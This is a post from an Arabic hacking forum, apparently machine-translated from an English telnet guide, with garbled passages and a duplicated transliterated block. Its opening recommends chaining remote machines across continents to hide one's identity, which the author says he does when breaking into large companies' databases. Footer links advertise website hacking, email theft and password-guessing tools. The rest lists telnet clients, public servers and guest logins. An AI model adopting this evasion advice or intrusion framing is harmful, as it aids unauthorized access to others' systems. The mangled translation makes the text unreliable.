ما تفعلونه هو أساسا باستخدام سلسلة من آلات وسلسلة من اجل اخفاء موقعك / الهوية. وأبعد كل ملقم / أجهزة الكمبيوتر عن بعد هو من جهة أخرى ، كان ذلك أفضل. إذا كنت تستطيع النائية عبر في قارة مختلفة ، أود أن أوصي بذلك ، لأن هذا هو ما أقوم به عندما كنت الإختراق قواعد بيانات الشركات الكبرى. ويفسر هذا الأسلوب


وعلاوة على ذلك يجري مع التلنت
في حين أن هذا الموقع يوفر الكثير من المعلومات ، وبرامج مثل Sub7 ، بينغ ، والتلنت وثائق مستفيضة خاصة بهم. إذا كنت ترغب في الإطلاع على كافة الميزات الغنية على التلنت ، Telnet.org هو الرقم الخاص مورد واحد.
كيفية





وهنا حل سريع باستخدام تطبيق التلنت وشملت ما يلي منهاج / نظام التشغيل :

(ملاحظة : 1234 هو رقم المنفذ هو اختياري وليس من الضروري في كثير من الأحيان أو)

يونكس

المستخدم] [@ المستخدم المضيف $ التلنت someplace.com 1234

أو

المستخدم] [@ المستخدم المضيف $ التلنت
> التلنت someplace.com فتح 1234



نوافذ

فوق
--

النوع :
somplace.com التلنت 1234
Kyfyh





Whnā Ḩl Sryʻ Bāstkhdām Tţbyq at-Tlnt Wshmlt Mā Yly Mnhāj / Nz̧ām at-Tshghyl :

(mlāḩz̧h : 1234 Hw Rqm al-Mnfdh Hw Ākhtyāry Wlys Mn aḑ-Ḑrwry Fy Kthyr Mn al-ʼḨyān ʼW)

Ywnks

al-Mstkhdm] [@ al-Mstkhdm al-Mḑyf $ at-Tlnt Someplace.com 1234

ʼW

al-Mstkhdm] [@ al-Mstkhdm al-Mḑyf $ at-Tlnt
> at-Tlnt Someplace.com Ftḩ 1234



Nwāfdh

Fwq
--

an-Nwʻ :
Somplace.com at-Tlnt 1234

اقتراح ترجمة أفضل
شكراً لمساهمتك في تقديم اقتراح حول الترجمة في خدمة Google للترجمة.

أسئلة وأجوبة



التلنت هو بروتوكول شبكة ويستخدم عادة للإشارة إلى تطبيق يستخدم هذا البروتوكول. ويستخدم تطبيق للاتصال بأجهزة الكمبيوتر عن بعد ، وعادة عن طريق برنامج التعاون الفني الميناء 23. في أغلب الأحيان ، سوف تكون telneting ليونيكس مثل نظام الخادم أو ربما جهاز شبكة بسيطة مثل التبديل. على سبيل المثال ، قد تقوم "التلنت في المنزل للتحقق من البريد الخاص بك في المدرسة". وهو يفعل ذلك ، هل سيكون التطبيق الخاص بك باستخدام التلنت للاتصال من الكمبيوتر إلى أحد مراكز خدمة مدرستك. مرة كنت تأسيس الاتصال ، وكنت في ذلك الحين مع تسجيل معلومات الحساب الخاص وتنفيذ الأوامر عن بعد على الكمبيوتر. الأوامر التي تستخدم مثل "ليرة سورية ، مؤتمر نزع السلاح ، والصنوبر ، الدردار ، والحديث ، جمهورية مقدونيا" تعمل أوامر النظام ، وليس أوامر التلنت.

في معظم الحالات الوصول عن بعد ، تم استبدال الغطاء الأمني عن طريق التلنت لتحسين الأمن عبر شبكات غير موثوق بها. لاستخدامه ومع ذلك ، لا يزال التلنت للوصول البعيد واليوم لا تزال شبكة قوية مخرج أداة كذلك. يمكنك العثور على مزيد من المعلومات الجيدة عن التلنت في ويكيبيديا.

المزيد من المواضيع الخاصة بالتلنت وهدا الموضوع خاص بالقراصنة العرب فقط

تطبيقات تلنت

إذا كنت تبحث عن التطبيق التلنت ، في محاولة واحدة من هذه :

لينكس ، ويونيكس ، وماكنتوش ، الخ.

معظم توزيعات يونكس مثل نظام التشغيل يأتي مع عميل التلنت وشيطان التلنت / الخادم. التحقق من وثائق التوزيع الخاص بك لمزيد من التفاصيل.
عبر منصة / ويب / فلاش / جافا

flashterm_ -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
SwitchTermJ -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
SyncTERM -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
نظام التشغيل ماك (9) وأقل

أفضل التلنت -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ~ rbraun / ماك / التلنت /
dataComet -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
التقييم الذاتي التلنت -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
أنيق التلنت -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
برو المدة -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
نوافذ 95/98/NT/2000

AbsoluteTelnet -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ألفا التواصل -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
أنسيو لايت -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
CommNet وCommNet الآمنة -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
إنبوب أشعة القطب السالب -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
EasyTerm -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
GTW420 -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
المحطة الطرفية السريعة الخاصة الطبعة -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
Intelliterm (TN3270 TN5250 و) -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
Intelliterm (VT220 ، VT320 ، VT420) -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ياء الأجل -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
ياء الأجل برو -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
KevTerm -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
Koalaterm -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
المخاوي W32 التلنت -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
NetTerm -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
جواز سفر -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
PolyScript -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
PowerTerm InterConnect/32 -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
PowerVT -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
المعجون -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ~ sgtatham / المعجون /
QVT / المدى -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
SecureCRT -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
تلستار -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
تيرا المدى -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
TN3270 بلس -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
منطقة الثقة -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
المزيد من بعض التوضيحات
أماكن للالتلنت



وسائل الترفيه!

من [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] :

حرب النجوم asciimation -- التلنت : / / towel.blinkenlights.nl (منفذ 23)
مارفن (بوت اليزا شبيهة) -- التلنت : / / towel.blinkenlights.nl : 42
العذر Bofh الخادم -- التلنت : / / towel.blinkenlights.nl : 666




الدلائل

Hytelnet هو القديم (1 غير مبقى الآن) الدليل :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]


Synchronet هي قائمة لطيفة من أنظمة بب س :
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]




الأطيان

في الوقت الحاضر ، فإننا لن محاولة لإعطاء قائمة كاملة من الطين أو مو ل. بدلا من ذلك ، راجع :

[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

بعض الطين التي قدمت من قبل القراء :
mud.crimson2.com -- ميناء 4000
fuskermud.net -- ميناء 7777
الظل lands.com -- ميناء 4000
shiva.ml.org -- ميناء 4300
mud.darkerrealms.org -- ميناء 2000




المكتبات

تذهب اليها وجمع المعرفة. نحن المكتبات الحالية :
(ويلي بعض عناوين من قبل المستخدم وكلمة السر)

كندا
calcna.ab.ca ضيف
access.cn.camriv.bc.ca
chebucto.ns.ca ضيف
ciao.trail.bc.ca ضيف
clias.org ضيف
wtp1.eastman.freenet.mb.ca ٪ ضيف زائر
freenet.edmonton.ab.ca ضيف
freenet.hamilton.on.ca ضيف
telnet.ncf.carleton.ca ضيف
strider.pgfn.bc.ca ضيف
freenet.sfn.saskatoon.sk.ca ضيف
البحر إلى عنان السماء freenet.bc.ca ضيف
infonet.st - johns.nf.ca الإدخال ضيف (مفتاح)
torfree.net ضيف
vcn.bc.ca ضيف
victoria.tc.ca ضيف

فنلندا
login.freenet.hut.fi زائر

ألمانيا
- a.fim.uni فرينيت - erlangen.de

هولندا
dds.nl غاست

الولايات المتحدة
locis.loc.gov (مكتبة الكونغرس)
freenet.akron.oh.us زائر
aztec2.asu.edu ضيف زائر
bigsky.bigsky.dillon.mt.us بب س
bcn.boulder.co.us شبكة اتصالات الإعمال
freenet.buffalo.edu فريبورت
capaccess.org ضيف زائر
sawdust.cvfn.org ضيف
فرينيت متعدد a.cwru.edu زائر
telnet.coin.missouri.edu ضيف
freenet.vcu.edu ضيف زائر
danenet.wicip.org ضيف
128.175.63.164
telnet.efn.org الإدخال ضيف (مفتاح)
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط] ضيف
genesee.freenet.org ضيف
grfn.org زائر
glfn.org
detroit.freenet.org زائر
gnofn.org زائر
heartland.bradley.edu1 الإدخال bbguest (مفتاح)
grex.cyberspace.org newuser
jackson.freenet.org زائر
clarion.korrnet.org زائر
telnet.llion.org ضيف
freenet.lcfn.org ضيف
lafn.org الأراضي الفلسطينية المحتلة. # 2
macatawa.org زائر زائر
midnet.csd.scarolina.edu زائر
omnifest.uwm.edu زائر
ns1.maf.mobile.al.us زائر
gator.naples.net ضيف زائر
omahafreenet.org زائر
telnet.orion.org ضيف
prairienet.org زائر
rain.gen.mo.us الزائر
rgfn.epcc.edu زائر
scn.org زائر
bcfreenet.seflin.lib.fl.us زائر
dc.seflin.org زائر
bc.seflin.org زائر
pb.seflin.org زائر
sendit.nodak.edu بب س
seorf.ohiou.edu ضيف
scfn.thpl.lib.fl.us زائر
tlcnet.muohio.edu زائر
tfn.net زائر
fnet.cc.utoledo.edu زائر زائر
traverse.lib.mi.us زائر
tso.uc.edu زائر
freenet.msp.mn.us ضيف
vergin.usvi.net
pen1.pen.k12.va.us ضيف زائر




يتحدثوا

وهنا يتحدثوا قليلة للحصول على انك بدأته الدردشة :

عباس === chardonnay.niagara.com : 3000
بلاك هوك === ouabache.abcs.com : 6000
الجين === step.jbu.edu : 7000
السحر القرية === user1.megalinx.net : 5000
العين في العالم === jordan.megalinx.net : 9001
ISCABBS === bbs.iscabbs.com : 23
أرض الميعاد ، وzeek.murlin.com === : 4321
السماء السابعة === lod.com : 1998
SpauMUSH === spice.per.iap.net.au : 9999
سباق الدراجات النارية المتكلم === funcity.ml.org : 6500
يوتوبيا باركواي === blacktape.cs.uchicago.edu : 3000




ملقمات كيرميت

التلنت : / / kermit.columbia.edu : 1649 -- [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

وهدا موقع يشرح بالاجنبى
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]

وهدا موقع اخر
[ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]
التعديل الأخير تم بواسطة دراكولا ; 08-31-2010 الساعة 03:02
[/size]
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://joymax.roo7.biz
 
مكتبة شروح اختراق المواقع والاجهزة والايميلات
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
»  أقوى شرح فيديو لتعليم اختراق المواقع
»  مكتبة شروحات فتح المنافذ في المودمات
» اكبر مكتبة مروعة لسرقة الايميلات
»  برنامج تخمين باسوورد المواقع مع الشرح
» حصريا برنامج فتح المواقع المحجوبة hotspot sailed

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتدى العقرب منظمة الهكر :: اختراق الايـميـلات-
انتقل الى: